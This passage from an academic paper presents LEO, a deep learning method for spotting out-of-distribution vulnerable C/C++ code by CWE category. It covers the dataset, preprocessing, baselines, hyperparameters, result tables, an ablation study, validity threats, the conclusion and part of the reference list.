1) Studied datasets: We conducted experiments on many different real-world CWE types extracted from an up-to-date and large C/C++ dataset, namely DiverseVul, provided by [71], which contains many types of CWE categories. The DiverseVul dataset contains 18,945 vulnerable functions and 330,492 non-vulnerable functions covering 150 CWEs.

In the scope of our paper, we focus on conducting our experiments on the top most dangerous and popular common weakness enumeration (CWE) categories [71], including CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), CWE-20 (Improper Input Validation), CWE-125 (Out-of-bounds Read), CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-787 (Out-of-bounds Write), CWE-416 (Use After Free), CWE-269 (Improper Privilege Management), CWE-94 (Improper Control of Generation of Code (Code Injection)), CWE-190 (Integer Overflow or Wraparound), CWE-264 (Permissions, Privileges, and Access Controls), CWE-863 (Incorrect Authorization), CWE-862 (Missing Authorization), and CWE-287 (Improper Authentication).

2) Data processing and embedding: We preprocessed the datasets before injecting them into our proposed LEO method and the baselines. In particular, we standardized the source code data samples by (i) removing comments, blank lines, and non-ASCII characters, and (ii) mapping user-defined variables to symbolic variable names (e.g., var1 and var2) and user-defined functions to symbolic function names (e.g., func1 and func2) using Treesitter [72]. We also replaced strings with a generic "str" token.

We then embedded the source code statements into vectors. For instance, consider the statement (written in the C/C++ programming language) for(var1=0;var1<10;var1++). We tokenize this statement into a sequence of tokens (i.e., for, (, var1, =, 0, ;, var1, <, 10, ;, var1, ++, )), and then we use a 150-dimensional Embedding layer followed by a Dropout layer (with a fixed drop probability p = 0.2), a 1D convolutional layer (with filter size 150 and kernel size 3), and a 1D max pooling layer to encode each source code statement in a source code function X. Note that we utilize commonly used values for these hyperparameters. Finally, a mini-batch of functions, in which each function consists of L encoded statements, is fed to the deep learning-based models. It is worth noting that the Embedding and 1D convolutional layers are learnable during the training process.

It is worth noting that, for the used datasets, the length L of each function is padded or truncated to 100 source code statements (i.e., we rely on the quantile values of the source code data's lengths to decide the length of each source code data sample). Specifically, more than 95% of the functions consist of 100 or fewer source code statements. Furthermore, we observe that almost all important information relevant to the vulnerability of each source code data sample (e.g., a function) lies in the first 100 source code statements.
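The statement-encoding pipeline just described can be sketched as follows. The vocabulary size and the number of tokens per statement below are illustrative assumptions; the 150-dimensional embedding, the dropout of 0.2, the Conv1D layer with filter size 150 and kernel size 3, the max pooling, and L = 100 follow the text.

import tensorflow as tf

VOCAB_SIZE = 20000   # assumption: vocabulary built from the tokenized corpus
L, T = 100, 32       # L statements per function; T token ids per statement
                     # (T is an assumption for illustration)

def build_statement_encoder():
    # Encodes one tokenized statement (T token ids) into a single vector.
    return tf.keras.Sequential([
        tf.keras.layers.Embedding(VOCAB_SIZE, 150),
        tf.keras.layers.Dropout(0.2),
        tf.keras.layers.Conv1D(filters=150, kernel_size=3, activation="relu"),
        tf.keras.layers.GlobalMaxPooling1D(),  # one 150-d vector per statement
    ])

# Applied to every one of the L statements of a function:
# token_ids: (batch, L, T) integer tensor  ->  encoded: (batch, L, 150)
encoder = tf.keras.layers.TimeDistributed(build_statement_encoder())

The resulting (batch, L, 150) tensor is what the selection network g(.,α) and the classifier f(.,β) of Section IV consume.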
3) Baseline methods: The main baselines of our proposed LEO method are effective and state-of-the-art methods for out-of-distribution detection, including Standard DNN [45], Outlier Exposure [24], and SSD [27]. These methods were originally applied to computer vision applications. To make these methods applicable to source code data, we keep their principles and make some modifications to the network for data representation learning, as used in our method. Other methods, e.g., [30], [44], [73], have recently been introduced for out-of-distribution detection. However, these methods operate based on the nature of vision data, so they are not applicable to source code data.

The additional baselines of our LEO method are state-of-the-art SVD methods, including VulDeePecker [8], CodeBERT [55], and ReGVD [15]. We investigate how these effective SVD methods perform for identifying OOD source code data. The rationale is that an effective model should produce high-quality data representations that also facilitate distinguishing the data between in-distribution and OOD.

We briefly summarize the baselines as follows:
• Standard DNN [45]. A baseline utilizing probabilities from softmax distributions for detecting misclassified and out-of-distribution examples in neural networks.
• Outlier Exposure [24]. It enables OOD (anomaly) detectors to generalize and detect unseen anomalies by training the anomaly detectors against an auxiliary dataset of outliers disjoint from the testing dataset (i.e., the OOD data).
• SSD [27]. An outlier detection method that utilizes contrastive representation learning followed by Mahalanobis distance-based detection in the feature space for outlier (out-of-distribution) detection.
• VulDeePecker [8]. One of the most effective deep learning-based software vulnerability detection methods, leveraging the power of bi-directional long short-term memory (LSTM) networks [74].
• CodeBERT [55]. A pre-trained model (based on the Transformer's encoder framework [56]) specializing in programming languages. Via CodeBERT, we aim to investigate how large language models work in the context of out-of-distribution source code data identification.
• ReGVD [15]. An effective graph neural network-based model (i.e., using graph convolutional networks [75] and gated graph neural networks [76]) for the software vulnerability detection problem.

4) Model's configurations: For the main baselines of our LEO method, including Standard DNN [45], Outlier Exposure [24], and SSD [27], which are popular and state-of-the-art approaches for out-of-distribution detection applied in the computer vision domain, we keep the principle of each method and use the same data embedding process for handling the sequential source code data as used in our method, making them applicable to out-of-distribution source code data identification. For the additional baseline approaches, the popular and state-of-the-art SVD methods (i.e., VulDeePecker [8], CodeBERT [55], and ReGVD [15]), we use the architectures proposed in the corresponding papers.

For our LEO method, for the g(·;α) and f(·;β) networks, we used deep feed-forward neural networks having three and two hidden layers, respectively, with the size of each hidden layer in {100, 300}. The dense hidden layers are followed by a ReLU function as the nonlinearity and Dropout [77] with a fixed retain probability p = 0.8 as regularization. The last dense layer of the g(·;α) network, for learning a discrete distribution, is followed by a sigmoid function, while the last dense layer of the f(·;β) network is followed by a softmax function for prediction. The number of clusters guiding the computation of the innovative cluster-contrastive learning is set in {1, 3, 5, 7, 9}. The trade-off hyper-parameter λ representing the weight of the innovative cluster-contrastive learning is in {10^{−2}, 10^{−1}, 10^{0}}, while the scalar temperature τ is in {0.5, 1.0}. The temperature ν for the Gumbel-Softmax distribution is also set in {0.5, 1.0}. Note that we utilize commonly used values for these hyperparameters.

For our LEO method and the baselines, we employed the Adam optimizer [70] with an initial learning rate equal to 10^{−3}, while the mini-batch size is set to 128. For the training process, we split the data of each in-distribution dataset into two random partitions: the first partition contains 80% of the data for training, and the second contains 20% for validation. For each in-distribution dataset, we used 10 epochs for the training process. We additionally applied gradient clipping regularization to prevent over-fitting. For each method, we ran the corresponding model several times and report the averaged FPR (at TPR 95%), AUROC, and AUPR measures.

We ran our experiments in Python using TensorFlow [78] on a 13th Gen Intel(R) Core(TM) i9-13900KF with 24 CPU cores at 3.00 GHz and 32GB RAM, integrated with a Gigabyte RTX 4090 Gaming OC 24GB. Some baseline methods (i.e., CodeBERT [55] and ReGVD [15]) were written using PyTorch [79]. For these baselines, we followed the source code published by the authors.

5) Measures: To measure the performance of our LEO method and the baselines, we use three main metrics, i.e., FPR (at TPR 95%), AUROC, and AUPR, commonly used in out-of-distribution (OOD) detection methods, as noted in [24], [27], [29]. In particular, the FPR (at TPR 95%) metric calculates what percentage of OOD data is predicted as in-distribution data; for the FPR measure, a smaller value is better. The AUROC (area under the receiver operating characteristic curve) metric presents the model's ability to discriminate between in-distribution and OOD data, while the AUPR (area under the precision-recall curve) metric measures whether the model can find all OOD data without accidentally marking any in-distribution data as OOD. For the AUROC and AUPR measures, a higher value is better.
B. Experimental results

RQ1: Can our method successfully identify OOD source code data? How effective is it compared to the baselines?

a) Approach: We compare the performance of our LEO method with the baselines, including Standard DNN [45], Outlier Exposure [24], SSD [27], VulDeePecker [8], CodeBERT [55], and ReGVD [15], on the task of out-of-distribution source code data identification using the FPR (at TPR 95%), AUROC, and AUPR measures.

As mentioned in Section V-A1, we conduct our experiments on the top most dangerous and popular software common weakness enumeration (CWE) categories. In the training phase, we alternately use source code data from each CWE category as in-distribution data to train our LEO method and the baselines. In the inference (testing) phase, for each model trained on a specific in-distribution CWE source code category, we use the remaining source code data from other CWE categories as out-of-distribution data to evaluate the model's performance. For example, we train each model using source code data from the CWE-269 category as in-distribution data. In the testing phase, we use source code data from other CWE categories (e.g., CWE-20 and CWE-200) as out-of-distribution data to evaluate the model's performance. We then apply the same process to the source code data from the other CWE categories.

It is worth noting that, following the setting of the out-of-distribution identification problem, we do not use any information from the out-of-distribution CWE source code data categories in the training phase. We only use the out-of-distribution CWE categories in the inference (testing) process for evaluating the models' performance. In practice, vulnerable data falling under out-of-distribution CWE categories pose a significantly higher risk to security systems than non-vulnerable data. Therefore, in our experiments, we primarily investigate the performance of our LEO method and the baselines on vulnerable data belonging to the OOD CWE categories.

TABLE I: The results of our LEO method and the baselines for the FPR (at TPR 95%), AUROC, and AUPR measures on the vulnerable source code of each OOD CWE category corresponding with specific in-distribution (ID) data. (The best results are in bold while the second highest results are underlined. The numbers highlighted in blue represent the improvements of our method over the second-best baseline.)

ID and OOD            Methods            FPR↓               AUROC↑             AUPR↑
CWE287 vs. CWE416     Standard DNN       86.30%             67.93%             84.60%
                      Outlier Exposure   79.30%             68.93%             86.13%
                      SSD                84.78%             66.71%             84.67%
                      VulDeePecker       77.63%             68.20%             85.61%
                      CodeBERT           88.57%             68.25%             85.49%
                      ReGVD              90.40%             58.58%             81.88%
                      LEO (Ours)         69.71% (↓7.92%)    76.75% (↑7.82%)    90.57% (↑4.44%)
CWE269 vs. CWE200     Standard DNN       79.36%             69.28%             78.75%
                      Outlier Exposure   80.30%             70.05%             78.49%
                      SSD                79.92%             72.70%             78.86%
                      VulDeePecker       83.90%             74.73%             81.62%
                      CodeBERT           88.43%             65.64%             74.55%
                      ReGVD              93.74%             61.01%             69.55%
                      LEO (Ours)         76.89% (↓2.47%)    79.33% (↑4.60%)    85.32% (↑3.70%)
CWE863 vs. CWE287     Standard DNN       50.00%             80.28%             78.26%
                      Outlier Exposure   71.21%             79.29%             76.57%
                      SSD                46.97%             82.55%             83.78%
                      VulDeePecker       48.48%             79.20%             76.53%
                      CodeBERT           53.85%             78.54%             78.43%
                      ReGVD              66.15%             80.42%             77.84%
                      LEO (Ours)         33.33% (↓13.64%)   87.06% (↑4.51%)    85.99% (↑2.21%)
CWE94 vs. CWE20       Standard DNN       73.26%             75.60%             95.60%
                      Outlier Exposure   74.44%             75.83%             95.28%
                      SSD                85.70%             70.40%             94.17%
                      VulDeePecker       77.85%             73.79%             95.54%
                      CodeBERT           87.55%             74.93%             94.58%
                      ReGVD              94.74%             66.98%             92.55%
                      LEO (Ours)         51.70% (↓21.56%)   84.37% (↑8.54%)    97.72% (↑2.12%)
CWE190 vs. CWE119     Standard DNN       85.54%             69.97%             60.47%
                      Outlier Exposure   82.69%             69.93%             60.22%
                      SSD                77.87%             74.46%             66.04%
                      VulDeePecker       85.17%             70.01%             59.79%
                      CodeBERT           90.72%             68.74%             55.74%
                      ReGVD              96.66%             50.50%             41.33%
                      LEO (Ours)         68.85% (↓9.02%)    77.59% (↑3.13%)    72.42% (↑6.38%)
CWE269 vs. CWE20      Standard DNN       72.96%             71.90%             91.43%
                      Outlier Exposure   77.33%             73.29%             91.62%
                      SSD                85.33%             69.69%             89.44%
                      VulDeePecker       79.63%             71.23%             90.33%
                      CodeBERT           91.40%             67.44%             87.62%
                      ReGVD              92.51%             62.60%             86.31%
                      LEO (Ours)         64.30% (↓8.66%)    79.51% (↑6.22%)    93.95% (↑2.33%)

b) Quantitative results: The experimental results in Table I demonstrate the superiority of our LEO method over the baseline approaches. In particular, our method obtains much higher performances on all of the used measures, including FPR, AUROC, and AUPR, by a high margin in almost all cases of the in-distribution and out-of-distribution CWE source code data. In general, on average, our method achieves significantly higher performances than the baselines by around 14.20%, 6.67%, and 5.12% on the FPR, AUROC, and AUPR measures, respectively, across the used in-distribution and out-of-distribution CWE source code data categories.

c) Qualitative results: To further demonstrate the advancement and effectiveness of our LEO method for OOD source code data identification compared to the baselines, we visualize the representations of both the in-distribution and out-of-distribution source code data in the feature space. The visualizations help us investigate whether our LEO method can successfully learn the characteristics of, and leverage the semantic relationships inside and between, the source code data to effectively distinguish between in-distribution and out-of-distribution source code data samples, facilitating the OOD source code data identification problem.

We use a t-SNE [80] projection, with the perplexity equal to 300, to visualize the distributions of the in-distribution and out-of-distribution data in the feature space. As illustrated in Figure 4, it becomes apparent that our LEO method significantly enhances the separation of the distributions between the in-distribution and out-of-distribution source code data in the latent space, compared to the baselines. These visual representations provide compelling evidence of the robustness of our LEO method in boosting the learning of source code data representations, thus facilitating the identification of out-of-distribution CWE source code data.
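A minimal sketch of this qualitative check, assuming scikit-learn's TSNE and matplotlib (the function name plot_id_vs_ood is illustrative):

import numpy as np
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt

def plot_id_vs_ood(reps_id, reps_ood):
    # Project ID and OOD representations to 2D with t-SNE (perplexity 300);
    # scikit-learn requires more samples than the chosen perplexity.
    reps = np.concatenate([reps_id, reps_ood])
    xy = TSNE(n_components=2, perplexity=300).fit_transform(reps)
    n = len(reps_id)
    plt.scatter(xy[:n, 0], xy[:n, 1], s=4, c="blue", label="in-distribution")
    plt.scatter(xy[n:, 0], xy[n:, 1], s=4, c="red", label="OOD (vulnerable)")
    plt.legend()
    plt.show()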
In conclusion for RQ1: The quantitative results in Table I on the three main measures (i.e., FPR (at TPR 95%), AUROC, and AUPR) and the qualitative visualizations depicted in Figure 4 show the effectiveness and advancement of our LEO method in achieving significantly higher performances for identifying OOD CWE source code data categories over the baselines. In short, our method achieves higher performances than the baselines by around 13.77%, 7.88%, and 4.84% on average on the FPR, AUROC, and AUPR measures, respectively, over the used in-distribution and OOD CWE categories.

Fig. 4: A 2D t-SNE projection of the data representation distributions of the in-distribution data (blue) and the out-of-distribution vulnerable data (red) in the latent space (i.e., where source code data from the CWE863 and CWE287 categories are used as the in-distribution data and out-of-distribution data, respectively) for our proposed LEO method and the baselines (Standard DNN, Outlier Exposure, SSD, VulDeePecker, ReGVD, and CodeBERT).

Fig. 5: The average results for the FPR (at TPR 95%), AUROC, and AUPR measures, respectively, of our LEO method and the baselines in all cases of the in-distribution and out-of-distribution CWE categories mentioned in Tables I and II. Note that for the FPR measure a smaller value is better, while for the AUROC and AUPR measures a higher value is better. We denote the Standard DNN, Outlier Exposure, VulDeePecker, and CodeBERT methods as SDNN, OE, VDP, and CBERT for short.

RQ2: How does our method perform in different cases of the in-distribution data when it consists of more than one CWE source code data category?

d) Approach: This research question reflects different real-world cases where the in-distribution source code data come from more than one CWE category (rather than the single-category setting presented in Table I). Therefore, we further investigate our proposed LEO method's performance in cases where different CWE categories exist in the in-distribution source code data and observe how the model performs compared to the baselines.

For this experiment, without loss of generality, we assume the presence of two and three different CWE categories within the in-distribution data, as shown in Table II. We randomly choose source code data from different CWE types to create the combinations that form the in-distribution data. Subsequently, for each case of the in-distribution data, after the training process, in the inference (testing) phase, we use source code data from other CWE categories as OOD data to evaluate the model's performance.

e) Results: The results in Table II once again demonstrate the effectiveness and superiority of our LEO method compared to the baselines for OOD source code data identification in all the various cases of the in-distribution data. Specifically, in these cases where more than one CWE category exists in the in-distribution data (e.g., two and three different CWE source code data categories), our LEO method still consistently obtains much higher performances on all pairs of the in-distribution and out-of-distribution source code data on the used measures. In these cases, on average, our LEO method gains higher performances than the baselines by around 14.22%, 6.45%, and 5.08% on the FPR (at TPR 95%), AUROC, and AUPR measures, respectively.
TABLE II: The results of our LEO method and the baselines for the FPR (at TPR 95%), AUROC, and AUPR measures on the vulnerable source code of each OOD CWE category corresponding with specific in-distribution (ID) data consisting of multiple CWE categories. (The best results are in bold while the second highest results are underlined. The numbers highlighted in blue represent the improvements of our method over the second-best baseline.)

ID and OOD                  Methods            FPR↓               AUROC↑             AUPR↑
CWE863+862 vs. CWE287       Standard DNN       54.55%             80.00%             64.71%
                            Outlier Exposure   57.58%             80.68%             65.78%
                            SSD                48.48%             89.22%             71.28%
                            VulDeePecker       60.61%             82.48%             56.61%
                            CodeBERT           63.08%             89.60%             64.08%
                            ReGVD              83.33%             67.89%             39.98%
                            LEO (Ours)         37.88% (↓10.60%)   90.48% (↑0.88%)    78.69% (↑7.41%)
CWE269+94 vs. CWE20         Standard DNN       81.48%             73.10%             86.88%
                            Outlier Exposure   75.41%             75.52%             88.55%
                            SSD                71.70%             75.99%             89.33%
                            VulDeePecker       79.26%             73.30%             86.93%
                            CodeBERT           85.47%             69.37%             84.56%
                            ReGVD              90.40%             62.13%             74.91%
                            LEO (Ours)         63.26% (↓8.44%)    82.44% (↑6.45%)    91.74% (↑2.41%)
CWE863+287 vs. CWE20        Standard DNN       80.44%             73.22%             91.77%
                            Outlier Exposure   80.07%             72.59%             91.56%
                            SSD                70.30%             80.70%             94.27%
                            VulDeePecker       78.37%             75.01%             92.39%
                            CodeBERT           85.92%             74.23%             91.37%
                            ReGVD              89.40%             62.29%             83.87%
                            LEO (Ours)         47.85% (↓22.45%)   88.76% (↑8.06%)    97.16% (↑2.89%)
CWE287+862+94 vs. CWE416    Standard DNN       84.02%             67.47%             70.30%
                            Outlier Exposure   87.82%             66.34%             69.24%
                            SSD                71.08%             74.95%             78.97%
                            VulDeePecker       78.39%             67.86%             72.03%
                            CodeBERT           91.62%             68.64%             67.69%
                            ReGVD              94.22%             55.55%             58.82%
                            LEO (Ours)         55.71% (↓15.37%)   84.98% (↑10.03%)   86.59% (↑7.62%)

In Figure 5, we present the average values of the FPR, AUROC, and AUPR measures, respectively, for our LEO method and the baselines in all cases of the ID and OOD CWE categories mentioned in Tables I and II. These average results highlight the advancement of our LEO method compared to the baselines. In short, on average, our LEO method obtains a significantly higher performance, by around 15.27%, 7.39%, and 4.93% on the FPR, AUROC, and AUPR measures, respectively, in comparison with the baselines.

In conclusion for RQ2: The experimental results in Table II again show the superiority of our proposed LEO method over the baselines for OOD source code data identification in different cases regarding the various numbers of CWE categories existing in the in-distribution data. In concurrence with the results shown in Table I, our method demonstrates a noticeable advancement with much higher performances compared to the baselines on the used measures in almost all cases of the ID and OOD CWE source code data categories.

RQ3: Do the innovative cluster-contrastive learning and underlying-data-distribution mechanism help improve the source code data representation learning for boosting the model performance in OOD source code data identification?

f) Approach: We compare the performance of our LEO method with itself in the cases of using and not using the cluster-contrastive learning mentioned in Eq. (6) and the underlying-data-distribution mechanism described in Eq. (5), to investigate whether these additional terms successfully boost the code data representation learning that facilitates out-of-distribution source code data identification. We experiment on several pairs of the in-distribution (ID) and out-of-distribution (OOD) CWE source code data categories, as shown in Table III. Note that we denote the method without the cluster-contrastive learning and the underlying-data-distribution mechanism as LEO-w/oCD.

TABLE III: The results of our LEO method for the FPR (at TPR 95%), AUROC, and AUPR measures on the vulnerable source code of each OOD CWE category corresponding with specific ID data, when using and not using the cluster-contrastive learning and the underlying-data-distribution mechanism. (The higher results in each pair of the ID and OOD data are in bold. The numbers highlighted in blue are the improvements of LEO over LEO-w/oCD.)

ID and OOD                  Methods      FPR↓               AUROC↑             AUPR↑
CWE269 vs. CWE200           LEO-w/oCD    83.14%             69.29%             78.13%
                            LEO          76.89% (↓6.25%)    79.33% (↑10.04%)   85.32% (↑7.19%)
CWE94 vs. CWE20             LEO-w/oCD    78.07%             73.54%             95.43%
                            LEO          51.70% (↓26.37%)   84.37% (↑10.83%)   97.72% (↑2.29%)
CWE287 vs. CWE416           LEO-w/oCD    81.13%             62.99%             84.96%
                            LEO          69.71% (↓11.42%)   76.75% (↑13.76%)   90.57% (↑5.61%)
CWE863+287 vs. CWE20        LEO-w/oCD    77.33%             74.23%             92.27%
                            LEO          47.85% (↓29.48%)   88.76% (↑14.53%)   97.16% (↑4.89%)
CWE863+862 vs. CWE287       LEO-w/oCD    50.00%             79.15%             62.60%
                            LEO          37.88% (↓12.12%)   90.48% (↑11.33%)   78.69% (↑16.09%)
CWE287+862+94 vs. CWE416    LEO-w/oCD    82.04%             64.39%             69.96%
                            LEO          55.71% (↓26.33%)   84.98% (↑20.59%)   86.59% (↑16.63%)

g) Results: The experimental results in Table III show the effectiveness of the cluster-contrastive learning and the underlying-data-distribution mechanism in improving the source code data representation learning process to boost the model performance for OOD source code data identification. In particular, our method with the cluster-contrastive learning and underlying-data-distribution mechanism terms (LEO) obtains considerably higher performances than itself without using these terms (denoted as LEO-w/oCD) in all cases of the in-distribution and out-of-distribution CWE categories.
Fig. 6: The average results for the FPR (at TPR 95%), AUROC, and AUPR measures, respectively, of LEO-w/oCD and LEO in all cases of the in-distribution and out-of-distribution CWE source code data categories mentioned in Table III.

The average experimental results for the FPR, AUROC, and AUPR measures of the LEO and LEO-w/oCD methods across all cases of the in-distribution (ID) and out-of-distribution (OOD) CWE source code data categories mentioned in Table III are shown in Figure 6. In particular, on average, LEO achieves much higher performances, by around 18.66%, 13.51%, and 8.78% on the FPR, AUROC, and AUPR measures, respectively, compared to LEO-w/oCD. These results underscore the substantial advancement of LEO over LEO-w/oCD in all the used ID and OOD cases, as measured by the FPR, AUROC, and AUPR metrics.

In conclusion for RQ3: The results mentioned in Table III on the FPR (at TPR 95%), AUROC, and AUPR measures show the benefits of using the cluster-contrastive learning and the underlying-data-distribution mechanism for boosting the source code data representation learning. These terms help significantly improve the model performance for OOD source code data identification in all cases of the in-distribution and out-of-distribution CWE source code data categories.

C. Threats to validity

1) Construct validity: Key construct validity threats concern whether the assessments of our proposed LEO method and the baselines demonstrate their capability for out-of-distribution source code data identification. In the cyber-security domain, the out-of-distribution source code data identification task helps determine if an input is from an in-distribution (ID) or out-of-distribution (OOD). That enables the model and security experts to take appropriate precautions and actions. In particular, this stage assists security analysts and software engineers in identifying potential out-of-distribution CWE source code data outside the established in-distribution CWE source code data categories before feeding the input data into subsequent machine learning and deep learning modules, to harden software security systems. To evaluate the performance of our LEO method and the baselines, we use three main measures widely used in out-of-distribution detection, including FPR (at TPR 95%), AUROC, and AUPR.

2) Internal validity: Key internal validity threats are relevant to the choice of hyper-parameter settings (i.e., optimizer, learning rate, number of layers in the deep neural networks, etc.). It is worth noting that finding a set of optimal hyperparameter settings for deep neural networks is expensive due to the large number of trainable parameters. To train our method, we only use common or default values for the hyperparameters. For example, we use the Adam optimizer; the learning rate equals 10^{−3}; the size of the neural layers is set in {100, 300}; and the scalar temperature τ used in the cluster-contrastive learning and the temperature ν for the Gumbel-Softmax distribution are set in {0.5, 1.0}. The number of clusters used in the cluster-contrastive learning, which aims to improve the data representation learning process, is treated as a hyperparameter. In our paper, we detail the hyperparameter settings (i.e., the tuned value ranges of the hyperparameters) in the released reproducible source code to support future replication studies.

3) External validity: Key external validity threats include whether our LEO method will generalize across multiple CWE source code categories. We mitigated this problem by conducting the experiments on an up-to-date and large C/C++ dataset, namely DiverseVul [71]. The DiverseVul dataset contains 18,945 vulnerable functions and 330,492 non-vulnerable functions covering 150 CWEs. In our paper, we conduct the experiments on the top most dangerous and popular CWE categories, including CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), CWE-20 (Improper Input Validation), CWE-125 (Out-of-bounds Read), CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-787 (Out-of-bounds Write), CWE-416 (Use After Free), CWE-269 (Improper Privilege Management), CWE-94 (Improper Control of Generation of Code), CWE-190 (Integer Overflow or Wraparound), CWE-264 (Permissions, Privileges, and Access Controls), CWE-863 (Incorrect Authorization), CWE-862 (Missing Authorization), and CWE-287 (Improper Authentication).

VI. CONCLUSION

In this paper, we have proposed an innovative deep learning-based approach, a pioneering study, for out-of-distribution (OOD) source code data identification. Our proposed LEO method, derived from information theory and combined with the use of innovative cluster-contrastive learning and the underlying-data-distribution mechanism, effectively learns the source code characteristics and figures out the semantic relationships inside and between source code data samples to boost the data representation learning, facilitating OOD source code data identification. The extensive experimental results on the top most dangerous and popular CWE source code data categories demonstrate the effectiveness and advancement of our LEO method compared to the state-of-the-art baselines by a wide margin.

REFERENCES

[1] M. Dowd, J. McDonald, and J. Schuh, The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities. Addison-Wesley Professional, 2006.
[2] S. Neuhaus, T. Zimmermann, C. Holler, and A. Zeller, "Predicting vulnerable software components," The ACM Conference on Computer and Communications Security, 2007.
[3] Y. Shin, A. Meneely, L. Williams, and J. A. Osborne, "Evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities," IEEE Transactions on Software Engineering, vol. 37, no. 6, pp. 772–787, 2011.
[4] F. Yamaguchi, F. Lindner, and K. Rieck, "Vulnerability extrapolation: assisted discovery of vulnerabilities using machine learning," The USENIX Conference on Offensive Technologies, pp. 13–23, 2011.
[5] G. Grieco, G. L. Grinblat, L. Uzal, S. Rawat, J. Feist, and L. Mounier, "Toward large-scale vulnerability discovery using machine learning," The ACM Conference on Data and Application Security and Privacy, pp. 85–96, 2016.
[6] Z. Li, D. Zou, S. Xu, H. Jin, H. Qi, and J. Hu, "VulPecker: An automated vulnerability detection system based on code similarity analysis," The Annual Conference on Computer Security Applications, pp. 201–213, 2016.
[7] S. Kim, S. Woo, H. Lee, and H. Oh, "VUDDY: A scalable approach for vulnerable code clone discovery," The IEEE Symposium on Security and Privacy, pp. 595–614, 2017.
[8] Z. Li, D. Zou, S. Xu, X. Ou, H. Jin, S. Wang, Z. Deng, and Y. Zhong, "VulDeePecker: A deep learning-based system for vulnerability detection," CoRR, vol. abs/1801.01681, 2018.
[9] X. Duan, J. Wu, S. Ji, Z. Rui, T. Luo, M. Yang, and Y. Wu, "VulSniper: Focus your attention to shoot fine-grained vulnerabilities," The International Joint Conference on Artificial Intelligence, IJCAI, pp. 4665–4671, 2019.
[10] X. Cheng, H. Wang, J. Hua, M. Zhang, G. Xu, L. Yi, and Y. Sui, "Static detection of control-flow-related vulnerabilities using graph embedding," The International Conference on Engineering of Complex Computer Systems (ICECCS), 2019.
[11] V. Nguyen, T. Le, T. Le, K. Nguyen, O. DeVel, P. Montague, L. Qu, and D. Phung, "Deep domain adaptation for vulnerable code function identification," The International Joint Conference on Neural Networks (IJCNN), 2019.
[12] Y. Zhuang, Z. Liu, P. Qian, Q. Liu, X. Wang, and Q. He, "Smart contract vulnerability detection using graph neural network," The International Joint Conference on Artificial Intelligence, IJCAI, pp. 3283–3290, 2020.
[13] V. Nguyen, T. Le, O. De Vel, P. Montague, J. Grundy, and D. Phung, "Dual-component deep domain adaptation: A new approach for cross project software vulnerability detection," The Pacific-Asia Conference on Knowledge Discovery and Data Mining, 2020.
[14] V. Nguyen, T. Le, O. de Vel, P. Montague, J. Grundy, and D. Phung, "Information-theoretic source code vulnerability highlighting," International Joint Conference on Neural Networks (IJCNN), 2021.
[15] V. Nguyen, D. Q. Nguyen, V. Nguyen, T. Le, Q. H. Tran, and D. Q. Phung, "ReGVD: Revisiting graph neural networks for vulnerability detection," The International Conference on Software Engineering: Companion Proceedings (ICSE-Companion), 2022.
[16] M. Fu, V. Nguyen, C. K. Tantithamthavorn, T. Le, and D. Phung, "VulExplainer: A transformer-based hierarchical distillation for explaining vulnerability types," The IEEE Transactions on Software Engineering, vol. 49, no. 10, 2023.
[17] M. Fu, C. K. Tantithamthavorn, T. Le, Y. Kume, V. Nguyen, D. Phung, and J. Grundy, "AIBugHunter: A practical tool for predicting, classifying and repairing software vulnerabilities," The Empirical Software Engineering, vol. 49, 2023.
[18] I. J. Goodfellow, J. Shlens, and C. Szegedy, "Explaining and harnessing adversarial examples," The International Conference on Learning Representations (ICLR), 2015.
[19] D. Amodei, C. Olah, J. Steinhardt, P. F. Christiano, J. Schulman, and D. Mané, "Concrete problems in AI safety," CoRR, vol. abs/1606.06565, 2016.
[20] X. Zhou, T. Zhang, and D. Lo, "Large language model for vulnerability detection: Emerging results and future directions," The New Ideas and Emerging Results Track at ICSE, 2024.
[21] A. M. Nguyen, J. Yosinski, and J. Clune, "Deep neural networks are easily fooled: High confidence predictions for unrecognizable images," CoRR, vol. abs/1412.1897, 2014.
[22] MITRE, "Common Weakness Enumeration (CWE™)," https://cwe.mitre.org/.
[23] D. Hendrycks and K. Gimpel, "A baseline for detecting misclassified and out-of-distribution examples in neural networks," CoRR, vol. abs/1610.02136, 2016.
[24] D. Hendrycks, M. Mazeika, and T. G. Dietterich, "Deep anomaly detection with outlier exposure," The International Conference on Learning Representations (ICLR), 2019.
[25] K. Lee, H. Lee, K. Lee, and J. Shin, "Training confidence-calibrated classifiers for detecting out-of-distribution samples," The International Conference on Learning Representations (ICLR), 2018.
[26] K. Lee, K. Lee, H. Lee, and J. Shin, "A simple unified framework for detecting out-of-distribution samples and adversarial attacks," The Neural Information Processing Systems (NeurIPS), 2018.
[27] V. Sehwag, M. Chiang, and P. Mittal, "SSD: A unified framework for self-supervised outlier detection," The International Conference on Learning Representations (ICLR), 2021.
[28] Y. Sun, Y. Ming, X. Zhu, and Y. Li, "Out-of-distribution detection with deep nearest neighbors," The International Conference on Machine Learning (ICML), 2022.
[29] J. Ren, P. J. Liu, E. Fertig, J. Snoek, R. Poplin, M. A. DePristo, J. V. Dillon, and B. Lakshminarayanan, "Likelihood ratios for out-of-distribution detection," The Neural Information Processing Systems (NeurIPS), 2019.
[30] J. Winkens, R. Bunel, A. G. Roy, R. Stanforth, V. Natarajan, J. R. Ledsam, P. MacWilliams, P. Kohli, A. Karthikesalingam, S. Kohl, A. T. Cemgil, S. M. A. Eslami, and O. Ronneberger, "Contrastive training for improved out-of-distribution detection," CoRR, vol. abs/2007.05566, 2020.
[31] P. C. Mahalanobis, "On the generalized distance in statistics," The National Institute of Science of India, 1936.
[32] Y. Zheng, S. Pujar, B. L. Lewis, L. Buratti, E. A. Epstein, B. Yang, J. Laredo, A. Morari, and Z. Su, "D2A: A dataset built for AI-based vulnerability detection methods using differential analysis," The International Conference on Software Engineering: Software Engineering in Practice (ICSE-SEIP), 2021.
[33] T. Le, V. Nguyen, T. Pham, M. Dinh, and T. H. Le, "Fuzzy semi-supervised large margin one-class support vector machine," The National Foundation for Science and Technology Development (NAFOSTED) Conference on Information and Computer Science, 2014.
